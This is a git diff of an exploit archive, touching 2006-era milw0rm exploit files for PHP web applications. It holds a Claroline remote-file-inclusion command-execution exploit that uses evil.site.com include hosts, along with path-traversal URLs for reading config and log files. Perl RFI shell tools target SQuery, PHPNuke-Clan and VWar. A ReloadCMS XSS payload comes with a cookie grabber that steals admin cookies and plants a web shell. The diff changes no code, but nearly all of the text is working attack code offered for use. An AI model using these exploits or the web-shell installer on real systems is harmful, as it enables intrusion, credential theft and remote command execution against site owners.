-  iii.a)if register_globals = On & allow_url_fopen = On:
-  http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://evil.site.com
-  where on:
-  http://evil.site.com/lib/fileUpload.lib.php/index.html
-  or:
-  http://evil.site.com/lib/pclzip/pclzip.lib.php/index.html
-  you have some php code
-
-  iii.b)if register_globals = On & magic_quotes_gpc = Off:
-  http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=/../../../../apache/logs/access.log%00
-  (after you have injected some code in Apache log files and braking the path
-  through a null char)
-
-  this is the exploit for iii.a)
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];$path=$argv[2];$location=$argv[3];$cmd='';
-if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
-{die("Check the path, it must begin and end with a trailing slash\r\n");}
-$port=80;$proxy="";
-for ($i=4; $i<=$argc-1; $i++)
-{
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
-
-$packet ="GET ".$p."claroline/learnPath/include/scormExport.inc.php";
-$packet.="?cmd=".urlencode($cmd)."&includePath=".urlencode($location)." HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"*delim*"))
-{
-  echo "Exploit succeeded...\r\n\r\n";
-  $temp=explode("*delim*",$html);
-  echo $temp[1];
-}
-else
-{echo "Exploit failed...";}
-?>
-
-# milw0rm.com [2006-03-30]
+#!/usr/bin/php -q -d short_open_tag=on
+ works with register_globals = On & allow_url_fopen = On\r\n\r\n";
+echo "dork: \"Powered by Claroline\" -demo\r\n\r\n";
+
+if ($argc<5) {
+echo "Usage: php ".$argv[0]." host path location OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to claroline\r\n";
+echo "location:  arbitrary location with the code to include\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com ls -la\r\n";
+echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com cat ./..\r\n";
+echo "/../inc/conf/claro_main.conf.php -p81\r\n";
+echo "php ".$argv[0]." target.com / http://evilsite.com uname -a -P1.1.1.1:80\r\n\r\n";
+echo "note, on remote location you need a\r\n";
+echo "/lib/fileUpload.lib.php/index.html\r\n";
+echo "or a\r\n";
+echo "/lib/pclzip/pclzip.lib.php/index.html\r\n";
+echo "with this code inside:\r\n\r\n";
+echo "'."\r\n";
+die;
+}
+
+/*
+  explaination:
+  software site: http://www.claroline.net/
+  description:   Claroline is a free application based on PHP/MySQL allowing
+                 teachers or education organizations to create and administrate
+	         courses through the web.
+
+  vulnerabilities:
+
+  i) system disclosure:
+  without to have an account you can see (not modify or include) all files on target system
+  regardless of any php.ini settings, ex:
+
+  http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../../../apache/logs/error.log
+  http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../claroline/inc/conf/claro_main.conf.php
+  (see inside html for this)
+
+  ii)  xss & full path disclosure:
+  http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=">
+
+  iii) and finally, arbitrary remote inclusion / remote commands execution:
+
+  iii.a)if register_globals = On & allow_url_fopen = On:
+  http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://evil.site.com
+  where on:
+  http://evil.site.com/lib/fileUpload.lib.php/index.html
+  or:
+  http://evil.site.com/lib/pclzip/pclzip.lib.php/index.html
+  you have some php code
+
+  iii.b)if register_globals = On & magic_quotes_gpc = Off:
+  http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=/../../../../apache/logs/access.log%00
+  (after you have injected some code in Apache log files and braking the path
+  through a null char)
+
+  this is the exploit for iii.a)
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];$path=$argv[2];$location=$argv[3];$cmd='';
+if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
+{die("Check the path, it must begin and end with a trailing slash\r\n");}
+$port=80;$proxy="";
+for ($i=4; $i<=$argc-1; $i++)
+{
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
+
+$packet ="GET ".$p."claroline/learnPath/include/scormExport.inc.php";
+$packet.="?cmd=".urlencode($cmd)."&includePath=".urlencode($location)." HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"*delim*"))
+{
+  echo "Exploit succeeded...\r\n\r\n";
+  $temp=explode("*delim*",$html);
+  echo $temp[1];
+}
+else
+{echo "Exploit failed...";}
+?>
+
+# milw0rm.com [2006-03-30]
diff --git a/platforms/php/webapps/1629.pl b/platforms/php/webapps/1629.pl
index 3fa810acd..cb69e258a 100755
--- a/platforms/php/webapps/1629.pl
+++ b/platforms/php/webapps/1629.pl
@@ -1,88 +1,88 @@
-#!/usr/bin/perl
-##
-# SQuery <= 4.5 Remote File Inclusion Exploit
-# Bug Found By uid0 code by zod
-## 
-# (c) 2006
-# ExploiterCode.com
-##
-# usage:
-# perl squery.pl   
-#
-# perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd
-#
-# cmd shell example: 
-#
-# cmd shell variable: ($_GET[cmd]);
-##
-# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else!
-#
-# special shout to [ill]will!
-##
-# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
-##
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-	print "[shell] \$";
-while()
-        {
-                $cmd=$_;
-                chomp($cmd);
-         
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.'lib/armygame.php?libpath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
-	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.+).Fatal.error/)
-
-
-{
-	$finreturn = $1;
-	$finreturn=~ tr/[ê]/[\n]/;
-	print "\r\n$finreturn\n\r";
-	last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print " 	   *SQuery <= 4.5 Remote File Inclusion Exploit*\r\n";   
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: perl squery.pl   \r\n\n";
- print "  - Full path to SQuery ex: http://www.site.com/SQuery/ \r\n";
- print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
- print "  - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "		           Bug Found by uid0\r\n";
- print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-04-01]
+#!/usr/bin/perl
+##
+# SQuery <= 4.5 Remote File Inclusion Exploit
+# Bug Found By uid0 code by zod
+## 
+# (c) 2006
+# ExploiterCode.com
+##
+# usage:
+# perl squery.pl   
+#
+# perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd
+#
+# cmd shell example: 
+#
+# cmd shell variable: ($_GET[cmd]);
+##
+# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else!
+#
+# special shout to [ill]will!
+##
+# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
+##
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+	print "[shell] \$";
+while()
+        {
+                $cmd=$_;
+                chomp($cmd);
+         
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.'lib/armygame.php?libpath='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
+	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.+).Fatal.error/)
+
+
+{
+	$finreturn = $1;
+	$finreturn=~ tr/[ê]/[\n]/;
+	print "\r\n$finreturn\n\r";
+	last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " 	   *SQuery <= 4.5 Remote File Inclusion Exploit*\r\n";   
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: perl squery.pl   \r\n\n";
+ print "  - Full path to SQuery ex: http://www.site.com/SQuery/ \r\n";
+ print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
+ print "  - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "		           Bug Found by uid0\r\n";
+ print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-04-01]
diff --git a/platforms/php/webapps/1630.pl b/platforms/php/webapps/1630.pl
index ed485bd91..3af4cd46f 100755
--- a/platforms/php/webapps/1630.pl
+++ b/platforms/php/webapps/1630.pl
@@ -1,89 +1,89 @@
-#!/usr/bin/perl
-##
-# PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit
-# Bug Found By uid0 code by zod
-## 
-# (c) 2006
-# ExploiterCode.com
-##
-# usage:
-# perl pnc.pl   
-#
-# perl pnc.pl http://site.com/PNC/ http://site.com/cmd.txt cmd
-#
-# cmd shell example: 
-#
-# cmd shell variable: ($_GET[cmd]);
-##
-# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else!
-#
-# special shout to [ill]will!
-##
-# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
-##
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-	print "[shell] \$";
-while()
-        {
-                $cmd=$_;
-                chomp($cmd);
-         
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.'modules/vWar_Account/includes/functions_common.php?vwar_root2='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
-	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.+).Warning.(.+).Warning/)
-
-
-
-{
-	$finreturn = $1;
-	$finreturn=~ tr/[ê]/[\n]/;
-	print "\r\n$finreturn\n\r";
-	last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print " 	   *PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit*\r\n";   
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: perl pnc.pl   \r\n\n";
- print "  - Full path to PNC ex: http://www.site.com/PNC/ \r\n";
- print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
- print "  - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "		           Bug Found by uid0\r\n";
- print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-04-01]
+#!/usr/bin/perl
+##
+# PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit
+# Bug Found By uid0 code by zod
+## 
+# (c) 2006
+# ExploiterCode.com
+##
+# usage:
+# perl pnc.pl   
+#
+# perl pnc.pl http://site.com/PNC/ http://site.com/cmd.txt cmd
+#
+# cmd shell example: 
+#
+# cmd shell variable: ($_GET[cmd]);
+##
+# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else!
+#
+# special shout to [ill]will!
+##
+# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
+##
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+	print "[shell] \$";
+while()
+        {
+                $cmd=$_;
+                chomp($cmd);
+         
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.'modules/vWar_Account/includes/functions_common.php?vwar_root2='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
+	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.+).Warning.(.+).Warning/)
+
+
+
+{
+	$finreturn = $1;
+	$finreturn=~ tr/[ê]/[\n]/;
+	print "\r\n$finreturn\n\r";
+	last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " 	   *PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit*\r\n";   
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: perl pnc.pl   \r\n\n";
+ print "  - Full path to PNC ex: http://www.site.com/PNC/ \r\n";
+ print "  - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
+ print "  - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "		           Bug Found by uid0\r\n";
+ print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-04-01]
diff --git a/platforms/php/webapps/1631.php b/platforms/php/webapps/1631.php
index 1ba341340..76b1f32b3 100755
--- a/platforms/php/webapps/1631.php
+++ b/platforms/php/webapps/1631.php
@@ -1,140 +1,140 @@
-nc target.host.com 80
-GET /path_to_reloadcms/ HTTP/1.0
-User-Agent: ">
-Host: target.host.com
-Connection: Close
-
-So, when admin see site statistics through the administration panel, javascript
-will run
-
-Once grab.php script captures admin cookie, the script itself can upload a shell
-trough filemanager, launch commands and write output to a logfile also, inside
-cookies, there is admin MD5 password hash
-
-rgod
-mail: rgod@autistici.org
-site: http://retrogod.altervista.org
-							                      */
-
-#--------------------------------grab.php---------------------------------------
-#cookie grabber / backdoor install
-
-$cmd="uname -a"; //a shell command, leave empty to lauch commands later trough suntzu.php
-$proxy=""; //you can use a proxy (ip:port), otherwise leave empty
-$logfile="log.txt";
-$filename="suntzu.php"; //shell filename
-
-error_reporting(0);
-ignore_user_abort(1);
-ini_set("max_execution_time",0);
-
-//log referer and cookies
-$fp=fopen($logfile,"a");
-fputs($fp,$_GET['ref']."|".$_GET['c']."\r\n");
-
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      die;
-    }
-    $parts=explode(':',$proxy);
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-}
-
-$temp=explode("/",$_GET['ref']);
-$host=$temp[2];
-$path="";
-if (count($temp)>4)
-{
-for ($i=3; $i<=count($temp)-2; $i++)
-{$path.="/".$temp[$i];}
-}
-$path.="/";
-$port=80;
-
-#step 1 -> Get full application path, it is inside html, you need this to upload a shell
-$packet ="GET ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: ".$_GET[c].";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-
-#step 2 -> Upload the evil code
-$temp=explode('name="path" value="',$html);
-$temp2=explode("\"",$temp[1]);
-$fullpath=$temp2[0];
-$shell='';
-$data="-----------------------------7d529a1d23092a\r\n";
-$data.="Content-Disposition: form-data; name=\"upload\"; filename=\"$filename\"\r\n";
-$data.="Content-Type:\r\n\r\n";
-$data.="$shell\r\n";
-$data.="-----------------------------7d529a1d23092a\r\n";
-$data.="Content-Disposition: form-data; name=\"path\"\r\n\r\n";
-$data.="$fullpath\r\n";
-$data.="-----------------------------7d529a1d23092a\r\n";
-$data.="Content-Disposition: form-data; name=\"test\"\r\n\r\n";
-$data.="Upload\r\n";
-$data.="-----------------------------7d529a1d23092a--\r\n";
-$packet ="POST ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Cookie: ".$_GET[c].";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-
-$packet ="GET ".$path."suntzu.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-
-//log output
-fputs($fp,"suntzu>".$cmd."\r\n");
-fputs($fp,"\r\n".$html."\r\n");
-fclose($fp);
-header ("Location: ".$_GET['ref']);
-?>
-
-# milw0rm.com [2006-04-02]
+nc target.host.com 80
+GET /path_to_reloadcms/ HTTP/1.0
+User-Agent: ">
+Host: target.host.com
+Connection: Close
+
+So, when admin see site statistics through the administration panel, javascript
+will run
+
+Once grab.php script captures admin cookie, the script itself can upload a shell
+trough filemanager, launch commands and write output to a logfile also, inside
+cookies, there is admin MD5 password hash
+
+rgod
+mail: rgod@autistici.org
+site: http://retrogod.altervista.org
+							                      */
+
+#--------------------------------grab.php---------------------------------------
+#cookie grabber / backdoor install
+
+$cmd="uname -a"; //a shell command, leave empty to lauch commands later trough suntzu.php
+$proxy=""; //you can use a proxy (ip:port), otherwise leave empty
+$logfile="log.txt";
+$filename="suntzu.php"; //shell filename
+
+error_reporting(0);
+ignore_user_abort(1);
+ini_set("max_execution_time",0);
+
+//log referer and cookies
+$fp=fopen($logfile,"a");
+fputs($fp,$_GET['ref']."|".$_GET['c']."\r\n");
+
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      die;
+    }
+    $parts=explode(':',$proxy);
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+}
+
+$temp=explode("/",$_GET['ref']);
+$host=$temp[2];
+$path="";
+if (count($temp)>4)
+{
+for ($i=3; $i<=count($temp)-2; $i++)
+{$path.="/".$temp[$i];}
+}
+$path.="/";
+$port=80;
+
+#step 1 -> Get full application path, it is inside html, you need this to upload a shell
+$packet ="GET ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: ".$_GET[c].";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+
+#step 2 -> Upload the evil code
+$temp=explode('name="path" value="',$html);
+$temp2=explode("\"",$temp[1]);
+$fullpath=$temp2[0];
+$shell='';
+$data="-----------------------------7d529a1d23092a\r\n";
+$data.="Content-Disposition: form-data; name=\"upload\"; filename=\"$filename\"\r\n";
+$data.="Content-Type:\r\n\r\n";
+$data.="$shell\r\n";
+$data.="-----------------------------7d529a1d23092a\r\n";
+$data.="Content-Disposition: form-data; name=\"path\"\r\n\r\n";
+$data.="$fullpath\r\n";
+$data.="-----------------------------7d529a1d23092a\r\n";
+$data.="Content-Disposition: form-data; name=\"test\"\r\n\r\n";
+$data.="Upload\r\n";
+$data.="-----------------------------7d529a1d23092a--\r\n";
+$packet ="POST ".$path."admin.php?show=module&id=general.filemanager HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Cookie: ".$_GET[c].";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+
+$packet ="GET ".$path."suntzu.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+
+//log output
+fputs($fp,"suntzu>".$cmd."\r\n");
+fputs($fp,"\r\n".$html."\r\n");
+fclose($fp);
+header ("Location: ".$_GET['ref']);
+?>
+
+# milw0rm.com [2006-04-02]
diff --git a/platforms/php/webapps/1632.pl b/platforms/php/webapps/1632.pl
index a01233e14..1b4fc3b3a 100755
--- a/platforms/php/webapps/1632.pl
+++ b/platforms/php/webapps/1632.pl
@@ -1,92 +1,92 @@
-#!/usr/bin/perl
-##
-# VWar <= 1.5.0 R12 Remote File Inclusion Exploit
-# Bug Found By uid0 code by zod
-## 
-# (c) 2006
-# ExploiterCode.com
-##
-# usage:
-# perl vwar.pl   
-#
-# perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd
-#
-# cmd shell example: 
-#
-# cmd shell variable: ($_GET[cmd]);
-##
-# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else!
-#
-# special shout to [ill]will!
-##
-# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
-##
-# Comments:
-# I release a new exploit because VWar
-# Dev. Team called my other exploit XSS!!!
-##
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-	print "[shell] \$";
-while()
-        {
-                $cmd=$_;
-                chomp($cmd);
-         
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.'includes/get_header.php?vwar_root='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
-	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.+).Fatal.error/)
-
-
-{
-	$finreturn = $1;
